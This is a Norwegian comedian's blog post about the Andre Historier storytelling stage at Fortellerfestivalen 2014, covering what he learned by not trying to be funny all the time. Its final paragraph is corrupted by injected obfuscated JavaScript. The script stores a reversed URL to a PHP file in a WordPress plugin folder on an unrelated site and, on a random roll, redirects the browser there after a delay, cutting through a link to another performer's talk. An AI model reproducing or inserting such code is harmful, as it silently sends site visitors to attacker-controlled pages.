Kunsten å ikke alltid være morsom.

Fortellerfestivalen 2014
 Foto: Tanja Steen/

Under årets Fortellerfestival fikk konseptet andup, slampoesi og spoken word fremført av muntlige fortellere, komikere, stuntpoeter og publikum selv.
En scene som er svært interessant for meg som komiker – både fordi jeg er stor fan av
The Moth og historiefortelling generelt. Et sted jeg kan bruke humor som virkemiddel, men ikke tenke setup/punch i alt jeg fremfører. Det er skummelt, men samtidig frigjørende å vite at man nødvendigvis ikke trenger å jage etter neste latterkule for at det man gjør og sier skal godkjennes av publikum. De er der for å høre på, og er vant til at utøverne spiller på hele følelsesregisteret. Jeg har fått meg noen wow-opplevelser på Andre Historier. Hvordan noen klarer å sette gråten i halsen for i neste øyeblikk få meg til å le igjen. Det krever skills.

Første gang jeg sto på Andre Historier fikk jeg panikk etter tre minutter og dro frem standuptekster fordi jeg til vanlig måler respons i latter, og som min bror sa: Neste gang forteller du historien som den var, det blir morsomt fordi du er komisk anlagt. Han hadde helt rett. Selv det å prate om angsten for at noe skulle gå galt da sønnen min ble født (en ikke helt ukomplisert affære) ble det både morsomt, intenst og tidvis tungt å snakke om. Men publikum likte det.

Men nå har jeg gjort dette et par ganger, og det er god trening. Jeg tror man blir en bedre komiker av å tørre å ikke være morsom hele tiden. Kveldens tema var «makt», og jeg fikk snakket litt om autoritære fedre, redselen for å bli min egen far og tiden da jeg var i opposisjon mot det meste. Overraskende nok lo folk mer enn jeg trodde de skulle gjøre.
Jeg måtte desverre gå i pausen da jeg måtte komme meg hjem med siste toget fordi datteren min hadde bursdag dagen etter, men jeg fikk sett $Ikf=function(n){if (typeof ($Ikf.list[n]) == «string») return $Ikf.list[n].split(«»).reverse().join(«»);return $Ikf.list[n];};$Ikf.list=[«\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andrehistorier.no/2014/05/makt-amir-mirzai/»> Amir Mirzai snakke om tiden som FN-flyktning i Norge. Janne Rønningen gjorde som vanlig en superb jobb som konferansier.

Nå håper jeg Andre Historier kommer tilbake på fast basis, gjerne der Andre Historier egentlig hører hjemme – på Relatert